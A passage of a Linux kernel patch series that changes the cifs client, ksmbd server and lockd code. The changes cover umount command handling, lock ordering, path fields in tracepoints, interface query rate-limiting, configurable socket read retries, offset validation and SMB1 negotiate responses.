++	 * can not set tcon->status to TID_EXITING yet since we don't know if umount -f will
++	 * fail later (e.g. due to open files).  TID_EXITING will be set just before tdis req sent
++	 */
+ 	spin_unlock(&tcon->tc_lock);
+ 	spin_unlock(&cifs_tcp_ses_lock);
+ 
+diff --git a/fs/cifs/cifssmb.c b/fs/cifs/cifssmb.c
+index 8c014a3ff9e00..566e6a26b897c 100644
+--- a/fs/cifs/cifssmb.c
++++ b/fs/cifs/cifssmb.c
+@@ -85,13 +85,11 @@ cifs_reconnect_tcon(struct cifs_tcon *tcon, int smb_command)
+ 
+ 	/*
+ 	 * only tree disconnect, open, and write, (and ulogoff which does not
+-	 * have tcon) are allowed as we start force umount
++	 * have tcon) are allowed as we start umount
+ 	 */
+ 	spin_lock(&tcon->tc_lock);
+ 	if (tcon->status == TID_EXITING) {
+-		if (smb_command != SMB_COM_WRITE_ANDX &&
+-		    smb_command != SMB_COM_OPEN_ANDX &&
+-		    smb_command != SMB_COM_TREE_DISCONNECT) {
++		if (smb_command != SMB_COM_TREE_DISCONNECT) {
+ 			spin_unlock(&tcon->tc_lock);
+ 			cifs_dbg(FYI, "can not send cmd %d while umounting\n",
+ 				 smb_command);
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index 5a889f5f5c3e5..6da2af97b8bac 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -1770,7 +1770,7 @@ out_err:
+ 	return ERR_PTR(rc);
+ }
+ 
+-/* this function must be called with ses_lock held */
++/* this function must be called with ses_lock and chan_lock held */
+ static int match_session(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+ {
+ 	if (ctx->sectype != Unspecified &&
+@@ -1781,12 +1781,8 @@ static int match_session(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+ 	 * If an existing session is limited to less channels than
+ 	 * requested, it should not be reused
+ 	 */
+-	spin_lock(&ses->chan_lock);
+-	if (ses->chan_max < ctx->max_channels) {
+-		spin_unlock(&ses->chan_lock);
++	if (ses->chan_max < ctx->max_channels)
+ 		return 0;
+-	}
+-	spin_unlock(&ses->chan_lock);
+ 
+ 	switch (ses->sectype) {
+ 	case Kerberos:
+@@ -1914,10 +1910,13 @@ cifs_find_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+ 			spin_unlock(&ses->ses_lock);
+ 			continue;
+ 		}
++		spin_lock(&ses->chan_lock);
+ 		if (!match_session(ses, ctx)) {
++			spin_unlock(&ses->chan_lock);
+ 			spin_unlock(&ses->ses_lock);
+ 			continue;
+ 		}
++		spin_unlock(&ses->chan_lock);
+ 		spin_unlock(&ses->ses_lock);
+ 
+ 		++ses->ses_count;
+@@ -2363,6 +2362,7 @@ cifs_put_tcon(struct cifs_tcon *tcon)
+ 	WARN_ON(tcon->tc_count < 0);
+ 
+ 	list_del_init(&tcon->tcon_list);
++	tcon->status = TID_EXITING;
+ 	spin_unlock(&tcon->tc_lock);
+ 	spin_unlock(&cifs_tcp_ses_lock);
+ 
+@@ -2742,6 +2742,7 @@ cifs_match_super(struct super_block *sb, void *data)
+ 
+ 	spin_lock(&tcp_srv->srv_lock);
+ 	spin_lock(&ses->ses_lock);
++	spin_lock(&ses->chan_lock);
+ 	spin_lock(&tcon->tc_lock);
+ 	if (!match_server(tcp_srv, ctx, dfs_super_cmp) ||
+ 	    !match_session(ses, ctx) ||
+@@ -2754,6 +2755,7 @@ cifs_match_super(struct super_block *sb, void *data)
+ 	rc = compare_mount_options(sb, mnt_data);
+ out:
+ 	spin_unlock(&tcon->tc_lock);
++	spin_unlock(&ses->chan_lock);
+ 	spin_unlock(&ses->ses_lock);
+ 	spin_unlock(&tcp_srv->srv_lock);
+ 
+diff --git a/fs/cifs/fs_context.h b/fs/cifs/fs_context.h
+index 1b8d4e27f831c..3de00e7127ec4 100644
+--- a/fs/cifs/fs_context.h
++++ b/fs/cifs/fs_context.h
+@@ -286,5 +286,5 @@ extern void smb3_update_mnt_flags(struct cifs_sb_info *cifs_sb);
+  * max deferred close timeout (jiffies) - 2^30
+  */
+ #define SMB3_MAX_DCLOSETIMEO (1 << 30)
+-#define SMB3_DEF_DCLOSETIMEO (5 * HZ) /* Can increase later, other clients use larger */
++#define SMB3_DEF_DCLOSETIMEO (1 * HZ) /* even 1 sec enough to help eg open/write/close/open/read */
+ #endif
+diff --git a/fs/cifs/link.c b/fs/cifs/link.c
+index d937eedd74fb6..c0f101fc1e5d0 100644
+--- a/fs/cifs/link.c
++++ b/fs/cifs/link.c
+@@ -360,6 +360,7 @@ smb3_query_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
+ 		.cifs_sb = cifs_sb,
++		.path = path,
+ 		.desired_access = GENERIC_READ,
+ 		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
+ 		.disposition = FILE_OPEN,
+@@ -427,6 +428,7 @@ smb3_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
+ 		.cifs_sb = cifs_sb,
++		.path = path,
+ 		.desired_access = GENERIC_WRITE,
+ 		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
+ 		.disposition = FILE_CREATE,
+diff --git a/fs/cifs/smb2inode.c b/fs/cifs/smb2inode.c
+index 8dd3791b5c538..163a03298430d 100644
+--- a/fs/cifs/smb2inode.c
++++ b/fs/cifs/smb2inode.c
+@@ -107,6 +107,7 @@ static int smb2_compound_op(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	vars->oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = full_path,
+ 		.desired_access = desired_access,
+ 		.disposition = create_disposition,
+ 		.create_options = cifs_create_options(cifs_sb, create_options),
+diff --git a/fs/cifs/smb2ops.c b/fs/cifs/smb2ops.c
+index c7f8dba5a855a..502b6915ccc41 100644
+--- a/fs/cifs/smb2ops.c
++++ b/fs/cifs/smb2ops.c
+@@ -530,6 +530,14 @@ parse_server_interfaces(struct network_interface_info_ioctl_rsp *buf,
+ 	p = buf;
+ 
+ 	spin_lock(&ses->iface_lock);
++	/* do not query too frequently, this time with lock held */
++	if (ses->iface_last_update &&
++	    time_before(jiffies, ses->iface_last_update +
++			(SMB_INTERFACE_POLL_INTERVAL * HZ))) {
++		spin_unlock(&ses->iface_lock);
++		return 0;
++	}
++
+ 	/*
+ 	 * Go through iface_list and do kref_put to remove
+ 	 * any unused ifaces. ifaces in use will be removed
+@@ -696,6 +704,12 @@ SMB3_request_interfaces(const unsigned int xid, struct cifs_tcon *tcon, bool in_
+ 	struct network_interface_info_ioctl_rsp *out_buf = NULL;
+ 	struct cifs_ses *ses = tcon->ses;
+ 
++	/* do not query too frequently */
++	if (ses->iface_last_update &&
++	    time_before(jiffies, ses->iface_last_update +
++			(SMB_INTERFACE_POLL_INTERVAL * HZ)))
++		return 0;
++
+ 	rc = SMB2_ioctl(xid, tcon, NO_FILE_ID, NO_FILE_ID,
+ 			FSCTL_QUERY_NETWORK_INTERFACE_INFO,
+ 			NULL /* no data input */, 0 /* no data input */,
+@@ -703,7 +717,7 @@ SMB3_request_interfaces(const unsigned int xid, struct cifs_tcon *tcon, bool in_
+ 	if (rc == -EOPNOTSUPP) {
+ 		cifs_dbg(FYI,
+ 			 "server does not support query network interfaces\n");
+-		goto out;
++		ret_data_len = 0;
+ 	} else if (rc != 0) {
+ 		cifs_tcon_dbg(VFS, "error %d on ioctl to get interface list\n", rc);
+ 		goto out;
+@@ -731,6 +745,7 @@ smb3_qfs_tcon(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = "",
+ 		.desired_access = FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -774,6 +789,7 @@ smb2_qfs_tcon(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = "",
+ 		.desired_access = FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -821,6 +837,7 @@ smb2_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = full_path,
+ 		.desired_access = FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -1105,6 +1122,7 @@ smb2_set_ea(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = path,
+ 		.desired_access = FILE_WRITE_EA,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -2096,6 +2114,7 @@ smb3_notify(const unsigned int xid, struct file *pfile,
+ 	tcon = cifs_sb_master_tcon(cifs_sb);
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = path,
+ 		.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -2168,6 +2187,7 @@ smb2_query_dir_first(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = path,
+ 		.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -2500,6 +2520,7 @@ smb2_query_info_compound(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = path,
+ 		.desired_access = desired_access,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -2634,6 +2655,7 @@ smb311_queryfs(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = "",
+ 		.desired_access = FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -2928,6 +2950,7 @@ smb2_query_symlink(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = full_path,
+ 		.desired_access = FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, create_options),
+@@ -3068,6 +3091,7 @@ smb2_query_reparse_tag(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = full_path,
+ 		.desired_access = FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, OPEN_REPARSE_POINT),
+@@ -3208,6 +3232,7 @@ get_smb2_acl_by_path(struct cifs_sb_info *cifs_sb,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = path,
+ 		.desired_access = READ_CONTROL,
+ 		.disposition = FILE_OPEN,
+ 		/*
+diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c
+index 23926f754d2aa..6e6e44d8b4c79 100644
+--- a/fs/cifs/smb2pdu.c
++++ b/fs/cifs/smb2pdu.c
+@@ -225,13 +225,9 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 	spin_lock(&tcon->tc_lock);
+ 	if (tcon->status == TID_EXITING) {
+ 		/*
+-		 * only tree disconnect, open, and write,
+-		 * (and ulogoff which does not have tcon)
+-		 * are allowed as we start force umount.
++		 * only tree disconnect allowed when disconnecting ...
+ 		 */
+-		if ((smb2_command != SMB2_WRITE) &&
+-		   (smb2_command != SMB2_CREATE) &&
+-		   (smb2_command != SMB2_TREE_DISCONNECT)) {
++		if (smb2_command != SMB2_TREE_DISCONNECT) {
+ 			spin_unlock(&tcon->tc_lock);
+ 			cifs_dbg(FYI, "can not send cmd %d while umounting\n",
+ 				 smb2_command);
+@@ -2746,7 +2742,7 @@ int smb311_posix_mkdir(const unsigned int xid, struct inode *inode,
+ 	rqst.rq_nvec = n_iov;
+ 
+ 	/* no need to inc num_remote_opens because we close it just below */
+-	trace_smb3_posix_mkdir_enter(xid, tcon->tid, ses->Suid, CREATE_NOT_FILE,
++	trace_smb3_posix_mkdir_enter(xid, tcon->tid, ses->Suid, full_path, CREATE_NOT_FILE,
+ 				    FILE_WRITE_ATTRIBUTES);
+ 	/* resource #4: response buffer */
+ 	rc = cifs_send_recv(xid, ses, server,
+@@ -3014,7 +3010,7 @@ SMB2_open(const unsigned int xid, struct cifs_open_parms *oparms, __le16 *path,
+ 	if (rc)
+ 		goto creat_exit;
+ 
+-	trace_smb3_open_enter(xid, tcon->tid, tcon->ses->Suid,
++	trace_smb3_open_enter(xid, tcon->tid, tcon->ses->Suid, oparms->path,
+ 		oparms->create_options, oparms->desired_access);
+ 
+ 	rc = cifs_send_recv(xid, ses, server,
+diff --git a/fs/cifs/trace.h b/fs/cifs/trace.h
+index 110070ba8b04e..d3053bd8ae731 100644
+--- a/fs/cifs/trace.h
++++ b/fs/cifs/trace.h
+@@ -701,13 +701,15 @@ DECLARE_EVENT_CLASS(smb3_open_enter_class,
+ 	TP_PROTO(unsigned int xid,
+ 		__u32	tid,
+ 		__u64	sesid,
++		const char *full_path,
+ 		int	create_options,
+ 		int	desired_access),
+-	TP_ARGS(xid, tid, sesid, create_options, desired_access),
++	TP_ARGS(xid, tid, sesid, full_path, create_options, desired_access),
+ 	TP_STRUCT__entry(
+ 		__field(unsigned int, xid)
+ 		__field(__u32, tid)
+ 		__field(__u64, sesid)
++		__string(path, full_path)
+ 		__field(int, create_options)
+ 		__field(int, desired_access)
+ 	),
+@@ -715,11 +717,12 @@ DECLARE_EVENT_CLASS(smb3_open_enter_class,
+ 		__entry->xid = xid;
+ 		__entry->tid = tid;
+ 		__entry->sesid = sesid;
++		__assign_str(path, full_path);
+ 		__entry->create_options = create_options;
+ 		__entry->desired_access = desired_access;
+ 	),
+-	TP_printk("xid=%u sid=0x%llx tid=0x%x cr_opts=0x%x des_access=0x%x",
+-		__entry->xid, __entry->sesid, __entry->tid,
++	TP_printk("xid=%u sid=0x%llx tid=0x%x path=%s cr_opts=0x%x des_access=0x%x",
++		__entry->xid, __entry->sesid, __entry->tid, __get_str(path),
+ 		__entry->create_options, __entry->desired_access)
+ )
+ 
+@@ -728,9 +731,10 @@ DEFINE_EVENT(smb3_open_enter_class, smb3_##name,  \
+ 	TP_PROTO(unsigned int xid,		\
+ 		__u32	tid,			\
+ 		__u64	sesid,			\
++		const char *full_path,		\
+ 		int	create_options,		\
+ 		int	desired_access),	\
+-	TP_ARGS(xid, tid, sesid, create_options, desired_access))
++	TP_ARGS(xid, tid, sesid, full_path, create_options, desired_access))
+ 
+ DEFINE_SMB3_OPEN_ENTER_EVENT(open_enter);
+ DEFINE_SMB3_OPEN_ENTER_EVENT(posix_mkdir_enter);
+diff --git a/fs/ksmbd/auth.c b/fs/ksmbd/auth.c
+index 6e61b5bc7d86e..cead696b656a8 100644
+--- a/fs/ksmbd/auth.c
++++ b/fs/ksmbd/auth.c
+@@ -727,8 +727,9 @@ static int generate_key(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+ 		goto smb3signkey_ret;
+ 	}
+ 
+-	if (conn->cipher_type == SMB2_ENCRYPTION_AES256_CCM ||
+-	    conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM)
++	if (key_size == SMB3_ENC_DEC_KEY_SIZE &&
++	    (conn->cipher_type == SMB2_ENCRYPTION_AES256_CCM ||
++	     conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM))
+ 		rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx), L256, 4);
+ 	else
+ 		rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx), L128, 4);
+diff --git a/fs/ksmbd/connection.c b/fs/ksmbd/connection.c
+index 56be077e5d8ac..2be9d7460494b 100644
+--- a/fs/ksmbd/connection.c
++++ b/fs/ksmbd/connection.c
+@@ -298,7 +298,7 @@ int ksmbd_conn_handler_loop(void *p)
+ 		kvfree(conn->request_buf);
+ 		conn->request_buf = NULL;
+ 
+-		size = t->ops->read(t, hdr_buf, sizeof(hdr_buf));
++		size = t->ops->read(t, hdr_buf, sizeof(hdr_buf), -1);
+ 		if (size != sizeof(hdr_buf))
+ 			break;
+ 
+@@ -319,13 +319,10 @@ int ksmbd_conn_handler_loop(void *p)
+ 		}
+ 
+ 		/*
+-		 * Check if pdu size is valid (min : smb header size,
+-		 * max : 0x00FFFFFF).
++		 * Check maximum pdu size(0x00FFFFFF).
+ 		 */
+-		if (pdu_size < __SMB2_HEADER_STRUCTURE_SIZE ||
+-		    pdu_size > MAX_STREAM_PROT_LEN) {
++		if (pdu_size > MAX_STREAM_PROT_LEN)
+ 			break;
+-		}
+ 
+ 		/* 4 for rfc1002 length field */
+ 		size = pdu_size + 4;
+@@ -344,7 +341,7 @@ int ksmbd_conn_handler_loop(void *p)
+ 		 * We already read 4 bytes to find out PDU size, now
+ 		 * read in PDU
+ 		 */
+-		size = t->ops->read(t, conn->request_buf + 4, pdu_size);
++		size = t->ops->read(t, conn->request_buf + 4, pdu_size, 2);
+ 		if (size < 0) {
+ 			pr_err("sock_read failed: %d\n", size);
+ 			break;
+diff --git a/fs/ksmbd/connection.h b/fs/ksmbd/connection.h
+index 3643354a3fa79..0e3a848defaf3 100644
+--- a/fs/ksmbd/connection.h
++++ b/fs/ksmbd/connection.h
+@@ -114,7 +114,8 @@ struct ksmbd_transport_ops {
+ 	int (*prepare)(struct ksmbd_transport *t);
+ 	void (*disconnect)(struct ksmbd_transport *t);
+ 	void (*shutdown)(struct ksmbd_transport *t);
+-	int (*read)(struct ksmbd_transport *t, char *buf, unsigned int size);
++	int (*read)(struct ksmbd_transport *t, char *buf,
++		    unsigned int size, int max_retries);
+ 	int (*writev)(struct ksmbd_transport *t, struct kvec *iovs, int niov,
+ 		      int size, bool need_invalidate_rkey,
+ 		      unsigned int remote_key);
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index 875eecc6b95e7..d0e76e2a14982 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -2996,8 +2996,11 @@ int smb2_open(struct ksmbd_work *work)
+ 							sizeof(struct smb_acl) +
+ 							sizeof(struct smb_ace) * ace_num * 2,
+ 							GFP_KERNEL);
+-					if (!pntsd)
++					if (!pntsd) {
++						posix_acl_release(fattr.cf_acls);
++						posix_acl_release(fattr.cf_dacls);
+ 						goto err_out;
++					}
+ 
+ 					rc = build_sec_desc(user_ns,
+ 							    pntsd, NULL, 0,
+@@ -4953,6 +4956,10 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 
+ 		info->Attributes |= cpu_to_le32(server_conf.share_fake_fscaps);
+ 
++		if (test_share_config_flag(work->tcon->share_conf,
++		    KSMBD_SHARE_FLAG_STREAMS))
++			info->Attributes |= cpu_to_le32(FILE_NAMED_STREAMS);
++
+ 		info->MaxPathNameComponentLength = cpu_to_le32(stfs.f_namelen);
+ 		len = smbConvertToUTF16((__le16 *)info->FileSystemName,
+ 					"NTFS", PATH_MAX, conn->local_nls, 0);
+@@ -7463,13 +7470,16 @@ static int fsctl_query_allocated_ranges(struct ksmbd_work *work, u64 id,
+ 	if (in_count == 0)
+ 		return -EINVAL;
+ 
++	start = le64_to_cpu(qar_req->file_offset);
++	length = le64_to_cpu(qar_req->length);
++
++	if (start < 0 || length < 0)
++		return -EINVAL;
++
+ 	fp = ksmbd_lookup_fd_fast(work, id);
+ 	if (!fp)
+ 		return -ENOENT;
+ 
+-	start = le64_to_cpu(qar_req->file_offset);
+-	length = le64_to_cpu(qar_req->length);
+-
+ 	ret = ksmbd_vfs_fqar_lseek(fp, start, length,
+ 				   qar_rsp, in_count, out_count);
+ 	if (ret && ret != -E2BIG)
+@@ -7770,7 +7780,7 @@ int smb2_ioctl(struct ksmbd_work *work)
+ 
+ 		off = le64_to_cpu(zero_data->FileOffset);
+ 		bfz = le64_to_cpu(zero_data->BeyondFinalZero);
+-		if (off > bfz) {
++		if (off < 0 || bfz < 0 || off > bfz) {
+ 			ret = -EINVAL;
+ 			goto out;
+ 		}
+diff --git a/fs/ksmbd/smb_common.c b/fs/ksmbd/smb_common.c
+index 2a4fbbd55b91f..5ab93fe0dec3f 100644
+--- a/fs/ksmbd/smb_common.c
++++ b/fs/ksmbd/smb_common.c
+@@ -434,7 +434,7 @@ int ksmbd_extract_shortname(struct ksmbd_conn *conn, const char *longname,
+ 
+ static int __smb2_negotiate(struct ksmbd_conn *conn)
+ {
+-	return (conn->dialect >= SMB21_PROT_ID &&
++	return (conn->dialect >= SMB20_PROT_ID &&
+ 		conn->dialect <= SMB311_PROT_ID);
+ }
+ 
+@@ -442,9 +442,26 @@ static int smb_handle_negotiate(struct ksmbd_work *work)
+ {
+ 	struct smb_negotiate_rsp *neg_rsp = work->response_buf;
+ 
+-	ksmbd_debug(SMB, "Unsupported SMB protocol\n");
+-	neg_rsp->hdr.Status.CifsError = STATUS_INVALID_LOGON_TYPE;
+-	return -EINVAL;
++	ksmbd_debug(SMB, "Unsupported SMB1 protocol\n");
++
++	/*
++	 * Remove 4 byte direct TCP header, add 2 byte bcc and
++	 * 2 byte DialectIndex.
++	 */
++	*(__be32 *)work->response_buf =
++		cpu_to_be32(sizeof(struct smb_hdr) - 4 + 2 + 2);
++	neg_rsp->hdr.Status.CifsError = STATUS_SUCCESS;
++
++	neg_rsp->hdr.Command = SMB_COM_NEGOTIATE;
++	*(__le32 *)neg_rsp->hdr.Protocol = SMB1_PROTO_NUMBER;
++	neg_rsp->hdr.Flags = SMBFLG_RESPONSE;
++	neg_rsp->hdr.Flags2 = SMBFLG2_UNICODE | SMBFLG2_ERR_STATUS |
++		SMBFLG2_EXT_SEC | SMBFLG2_IS_LONG_NAME;
++
++	neg_rsp->hdr.WordCount = 1;
++	neg_rsp->DialectIndex = cpu_to_le16(work->conn->dialect);
++	neg_rsp->ByteCount = 0;
++	return 0;
+ }
+ 
+ int ksmbd_smb_negotiate_common(struct ksmbd_work *work, unsigned int command)
+@@ -465,7 +482,7 @@ int ksmbd_smb_negotiate_common(struct ksmbd_work *work, unsigned int command)
+ 		}
+ 	}
+ 
+-	if (command == SMB2_NEGOTIATE_HE && __smb2_negotiate(conn)) {
++	if (command == SMB2_NEGOTIATE_HE) {
+ 		ret = smb2_handle_negotiate(work);
+ 		init_smb2_neg_rsp(work);
+ 		return ret;
+diff --git a/fs/ksmbd/smb_common.h b/fs/ksmbd/smb_common.h
+index e663ab9ea7590..d30ce4c1a1517 100644
+--- a/fs/ksmbd/smb_common.h
++++ b/fs/ksmbd/smb_common.h
+@@ -158,8 +158,15 @@
+ 
+ #define SMB1_PROTO_NUMBER		cpu_to_le32(0x424d53ff)
+ #define SMB_COM_NEGOTIATE		0x72
+-
+ #define SMB1_CLIENT_GUID_SIZE		(16)
++
++#define SMBFLG_RESPONSE 0x80	/* this PDU is a response from server */
++
++#define SMBFLG2_IS_LONG_NAME	cpu_to_le16(0x40)
++#define SMBFLG2_EXT_SEC		cpu_to_le16(0x800)
++#define SMBFLG2_ERR_STATUS	cpu_to_le16(0x4000)
++#define SMBFLG2_UNICODE		cpu_to_le16(0x8000)
++
+ struct smb_hdr {
+ 	__be32 smb_buf_length;
+ 	__u8 Protocol[4];
+@@ -199,28 +206,7 @@ struct smb_negotiate_req {
+ struct smb_negotiate_rsp {
+ 	struct smb_hdr hdr;     /* wct = 17 */
+ 	__le16 DialectIndex; /* 0xFFFF = no dialect acceptable */
+-	__u8 SecurityMode;
+-	__le16 MaxMpxCount;
+-	__le16 MaxNumberVcs;
+-	__le32 MaxBufferSize;
+-	__le32 MaxRawSize;
+-	__le32 SessionKey;
+-	__le32 Capabilities;    /* see below */
+-	__le32 SystemTimeLow;
+-	__le32 SystemTimeHigh;
+-	__le16 ServerTimeZone;
+-	__u8 EncryptionKeyLength;
+ 	__le16 ByteCount;
+-	union {
+-		unsigned char EncryptionKey[8]; /* cap extended security off */
+-		/* followed by Domain name - if extended security is off */
+-		/* followed by 16 bytes of server GUID */
+-		/* then security blob if cap_extended_security negotiated */
+-		struct {
+-			unsigned char GUID[SMB1_CLIENT_GUID_SIZE];
+-			unsigned char SecurityBlob[1];
+-		} __packed extended_response;
+-	} __packed u;
+ } __packed;
+ 
+ struct filesystem_attribute_info {
+diff --git a/fs/ksmbd/transport_rdma.c b/fs/ksmbd/transport_rdma.c
+index 096eda9ef873b..c06efc020bd95 100644
+--- a/fs/ksmbd/transport_rdma.c
++++ b/fs/ksmbd/transport_rdma.c
+@@ -670,7 +670,7 @@ static int smb_direct_post_recv(struct smb_direct_transport *t,
+ }
+ 
+ static int smb_direct_read(struct ksmbd_transport *t, char *buf,
+-			   unsigned int size)
++			   unsigned int size, int unused)
+ {
+ 	struct smb_direct_recvmsg *recvmsg;
+ 	struct smb_direct_data_transfer *data_transfer;
+diff --git a/fs/ksmbd/transport_tcp.c b/fs/ksmbd/transport_tcp.c
+index 603893fd87f57..20e85e2701f26 100644
+--- a/fs/ksmbd/transport_tcp.c
++++ b/fs/ksmbd/transport_tcp.c
+@@ -291,16 +291,18 @@ static int ksmbd_tcp_run_kthread(struct interface *iface)
+ 
+ /**
+  * ksmbd_tcp_readv() - read data from socket in given iovec
+- * @t:		TCP transport instance
+- * @iov_orig:	base IO vector
+- * @nr_segs:	number of segments in base iov
+- * @to_read:	number of bytes to read from socket
++ * @t:			TCP transport instance
++ * @iov_orig:		base IO vector
++ * @nr_segs:		number of segments in base iov
++ * @to_read:		number of bytes to read from socket
++ * @max_retries:	maximum retry count
+  *
+  * Return:	on success return number of bytes read from socket,
+  *		otherwise return error number
+  */
+ static int ksmbd_tcp_readv(struct tcp_transport *t, struct kvec *iov_orig,
+-			   unsigned int nr_segs, unsigned int to_read)
++			   unsigned int nr_segs, unsigned int to_read,
++			   int max_retries)
+ {
+ 	int length = 0;
+ 	int total_read;
+@@ -308,7 +310,6 @@ static int ksmbd_tcp_readv(struct tcp_transport *t, struct kvec *iov_orig,
+ 	struct msghdr ksmbd_msg;
+ 	struct kvec *iov;
+ 	struct ksmbd_conn *conn = KSMBD_TRANS(t)->conn;
+-	int max_retry = 2;
+ 
+ 	iov = get_conn_iovec(t, nr_segs);
+ 	if (!iov)
+@@ -335,14 +336,23 @@ static int ksmbd_tcp_readv(struct tcp_transport *t, struct kvec *iov_orig,
+ 		} else if (conn->status == KSMBD_SESS_NEED_RECONNECT) {
+ 			total_read = -EAGAIN;
+ 			break;
+-		} else if ((length == -ERESTARTSYS || length == -EAGAIN) &&
+-			   max_retry) {
++		} else if (length == -ERESTARTSYS || length == -EAGAIN) {
++			/*
++			 * If max_retries is negative, Allow unlimited
++			 * retries to keep connection with inactive sessions.
++			 */
++			if (max_retries == 0) {
++				total_read = length;
++				break;
++			} else if (max_retries > 0) {
++				max_retries--;
++			}
++
+ 			usleep_range(1000, 2000);
+ 			length = 0;
+-			max_retry--;
+ 			continue;
+ 		} else if (length <= 0) {
+-			total_read = -EAGAIN;
++			total_read = length;
+ 			break;
+ 		}
+ 	}
+@@ -358,14 +368,15 @@ static int ksmbd_tcp_readv(struct tcp_transport *t, struct kvec *iov_orig,
+  * Return:	on success return number of bytes read from socket,
+  *		otherwise return error number
+  */
+-static int ksmbd_tcp_read(struct ksmbd_transport *t, char *buf, unsigned int to_read)
++static int ksmbd_tcp_read(struct ksmbd_transport *t, char *buf,
++			  unsigned int to_read, int max_retries)
+ {
+ 	struct kvec iov;
+ 
+ 	iov.iov_base = buf;
+ 	iov.iov_len = to_read;
+ 
+-	return ksmbd_tcp_readv(TCP_TRANS(t), &iov, 1, to_read);
++	return ksmbd_tcp_readv(TCP_TRANS(t), &iov, 1, to_read, max_retries);
+ }
+ 
+ static int ksmbd_tcp_writev(struct ksmbd_transport *t, struct kvec *iov,
+diff --git a/fs/lockd/clnt4xdr.c b/fs/lockd/clnt4xdr.c
+index 7df6324ccb8ab..8161667c976f8 100644
+--- a/fs/lockd/clnt4xdr.c
++++ b/fs/lockd/clnt4xdr.c
+@@ -261,7 +261,6 @@ static int decode_nlm4_holder(struct xdr_stream *xdr, struct nlm_res *result)
+ 	u32 exclusive;
+ 	int error;
+ 	__be32 *p;
+-	s32 end;
+ 
+ 	memset(lock, 0, sizeof(*lock));
+ 	locks_init_lock(fl);
+@@ -285,13 +284,7 @@ static int decode_nlm4_holder(struct xdr_stream *xdr, struct nlm_res *result)
+ 	fl->fl_type  = exclusive != 0 ? F_WRLCK : F_RDLCK;
+ 	p = xdr_decode_hyper(p, &l_offset);
+ 	xdr_decode_hyper(p, &l_len);
+-	end = l_offset + l_len - 1;
+-
+-	fl->fl_start = (loff_t)l_offset;
+-	if (l_len == 0 || end < 0)
+-		fl->fl_end = OFFSET_MAX;
+-	else
+-		fl->fl_end = (loff_t)end;
++	nlm4svc_set_file_lock_range(fl, l_offset, l_len);
+ 	error = 0;
+ out:
+ 	return error;
+diff --git a/fs/lockd/xdr4.c b/fs/lockd/xdr4.c
+index 712fdfeb8ef06..5fcbf30cd2759 100644
+--- a/fs/lockd/xdr4.c
++++ b/fs/lockd/xdr4.c
